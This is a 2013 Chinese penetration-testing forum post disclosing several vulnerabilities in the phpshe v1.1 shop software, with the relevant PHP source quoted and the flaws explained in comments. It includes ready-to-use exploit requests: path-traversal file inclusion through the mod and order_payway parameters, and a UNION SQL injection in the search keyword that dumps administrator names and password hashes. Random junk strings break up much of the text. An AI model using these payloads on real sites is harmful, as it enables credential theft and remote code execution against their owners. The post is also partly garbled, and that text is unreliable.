找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2293|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/" C, l9 S( D4 v; g; V8 G- S# d# Z
/* Phpshe v1.1 Vulnerability6 A6 H: O' Y: F1 n# U: f" E& [# ?
/* ========================# i' E2 T- b# P  F( l9 ?) I
/* By: : Kn1f3
" ]3 {* a- a" E' e7 a: U( t/* E-Mail : 681796@qq.com# n3 V6 B+ M2 p+ ^
/*******************************************************/
4 X. |. _3 q/ V# m0 p0×00 整体大概参数传输
% o7 k; ^2 v5 T  |! \- r
; K, ]& x' |2 }
2 b5 S! t0 M& x1 h0 Z$ g0 Y- [& B* M5 ^% ^
//common.php
- j8 V& p! H: R" p7 d& hif (get_magic_quotes_gpc()) {
" I% A2 w/ J" ~. L!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');* s  ^- q/ m* |2 N- u4 [. |* _$ `( [
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
! `+ J. v; |" c  K! m2 o: j8 r}& I4 J% H6 G" J) X, N* A' R5 p
else {
5 @; x9 Y9 y: S4 a4 R! B8 r!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');0 K: n$ y9 D- _- p: k! f
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
, E9 C/ ~# X) ?+ w3 N}1 l1 W* j. ~# _; ^
session_start();: y/ ]9 ?" v) d" C5 X
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
; {: V" P& s, C!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
6 o- v( R0 g, x4 j; A/ U: Y' G( v! F7 r
* f! A! V# `* E& X0×01 包含漏洞
/ E+ c  B; t4 h* ?! p & r4 }: F8 w* B1 u# }% u" N+ H

+ W/ m9 P9 Q9 g* y1 W//首页文件& m# M5 {9 [$ j5 p
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
& Q: w6 \' G% L: S* P4 B% H; m3 |include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞* T4 D3 w& y# p7 D+ j
pe_result();
9 i7 t$ X7 N1 ]7 x0 Q?>
" p! p% A3 c1 u4 e) l% W3 z//common 文件 第15行开始
2 R0 V2 [" l% H& aurl路由配置
' ]0 V3 g& S' @' y$module = $mod = $act = 'index';
6 i  }& t# f. v$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);$ Z' B( ?- I3 |! }" f
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
7 C+ w8 y/ W" b1 A2 a2 s* [6 h2 i$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
) {7 p) A$ h  g8 H; ^/ A//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00! v' z6 U1 t# j* X2 n$ F: [


" ], ~# I; l9 B# \ ) H, E. y  T- f  L+ q
0×02 搜索注入6 s- d+ T! w3 v

% x& g. K5 {2 k3 G+ G/ d0 y! i<code id="code2">

//product.php文件0 e7 n0 ]5 W% |3 G$ c
case 'list':. z" D9 b' \; b/ C2 u
$category_id = intval($id);9 r7 v# ]7 ?, c0 G, O& w& a
$info = $db->pe_select('category', array('category_id'=>$category_id));
8 d( Z9 y% P' q$ t//搜索
- v( b1 g3 H8 g5 W& r$sqlwhere = " and `product_state` = 1";
' R, }0 x+ e: f" c( Wpe_lead('hook/category.hook.php');1 s7 ]( A; f- F$ J2 W$ o
if ($category_id) {  T- X+ P5 ~  p* G& X& B5 j2 E1 {
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";' \$ ^9 ]9 |7 C+ L' Z
}
: e; ~% j- H  g) z- X$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤2 p5 l# T. |0 z, _3 e" N% h
if ($_g_orderby) {
3 W% Q: E- M/ z5 c0 C4 w! r$orderby = explode('_', $_g_orderby);
. `" L  i+ w% A3 s9 j. Z$ |5 A6 Q$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";  V/ X4 o( u/ G& i
}$ L6 u) N" W( g4 v+ P& l) m) c2 [: H
else {
. P6 r) d1 K5 ~2 M$sqlwhere .= " order by `product_id` desc";& t9 N* e- d5 ^  q  `2 Z. V* @8 v. z
}4 K! o  t! ^  W7 S7 ~* C
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
4 E4 n+ O# j4 c/ G//热卖排行# T$ J- W% D# M# G
$product_hotlist = product_hotlist();$ ~* k1 f2 Y5 Q0 d0 w
//当前路径4 S+ J, Q* d$ l) J8 o" d% e+ a8 I0 N, Y
$nowpath = category_path($category_id);
& N" v: }, M: B: V7 Y. ~) y8 g" |$seo = pe_seo($info['category_name']);0 ]8 h1 s4 ^1 `1 n2 a
include(pe_tpl('product_list.html'));
2 u% ~$ L4 Z  C+ R+ s1 W, C//跟进selectall函数库6 v3 j; e3 [0 Y4 m# B- E
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
* s* e- `' e) v* k& x. z; d7 ~{
8 u" R- `; o( x' |3 g% s% y/ o, _//处理条件语句
# x+ @+ ~9 l7 ^$sqlwhere = $this->_dowhere($where);
  e% E7 ]+ |. r# vreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);  \1 `: o6 J, v. Q6 D
}
8 Q! K; I1 n0 z9 T//exp2 L2 a5 i; T2 W5 `
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1- A9 \( I: }8 R* |1 K) b6 y

</code>0 E. ^' E# Z! I8 @! _7 r# _
0 X; U0 C+ j0 U, i1 s
0×03 包含漏洞2& T6 s/ q+ R: {8 Z8 h( D
# A6 {& r3 Z9 j  q/ X$ U& f
<code id="code3">

//order.php

case 'pay':

* M( }/ u' \- J, \: g; r
$order_id = pe_dbhold($_g_id);


& ^5 d% \( U1 @& m/ Z: K$cache_payway = cache::get('payway');

6 \5 w( ^# M5 ]4 p- X+ H
foreach($cache_payway as $k => $v) {


5 Q# x- h6 Y9 F6 J$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

2 W4 L5 i* I) _) F3 O
if ($k == 'bank') {

' ]( s! g% ]; Q
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


7 u% M: F: k0 h}

% K0 l, c9 H) T6 g6 G+ ?) G. e
}


( s8 G4 [% `* H9 O. X' Q$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

4 M) I. A" z% y4 Q! T& D& h: X1 [) w
!$order['order_id'] && pe_error('订单号错误...');


4 Q, Z% o4 {9 x7 A, F* N6 gif (isset($_p_pesubmit)) {

6 X( r- L' R3 I" `, m7 z; ~
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

3 D% {/ q- V' J5 |
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

9 ~  S, x5 H8 C$ ^3 X
foreach ($info_list as $v) {


- ^9 ]7 C1 }9 c4 N$order['order_name'] .= "{$v['product_name']};";
4 T; x6 Z% A: r/ {* S


+ j' j# u4 C1 L# [) Y7 y}


2 T/ I2 k  O6 I$ V7 r$ fecho '正在为您连接支付网站,请稍后...';


8 {6 ^: m8 x! u" }: t# Cinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


# M  e7 y% o* g1 ~. o1 |}//当一切准备好的时候就可以进行"鸡肋包含了"

" P" }/ r2 o* `. X, B3 V
else {

# T7 z0 `& P+ P7 V- T& f
pe_error('支付错误...');

; p( i* x2 \4 t6 `! |/ B! A
}

9 q/ |# i& B& u' C. x! u
}


. g. Q% B3 B, h0 z' p/ I# f$seo = pe_seo('选择支付方式');


. f0 A8 k! f/ H* }include(pe_tpl('order_pay.html'));


; O) x8 M9 W- H( M7 o) bbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>& W! D( O6 O+ H9 g( G- Z

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表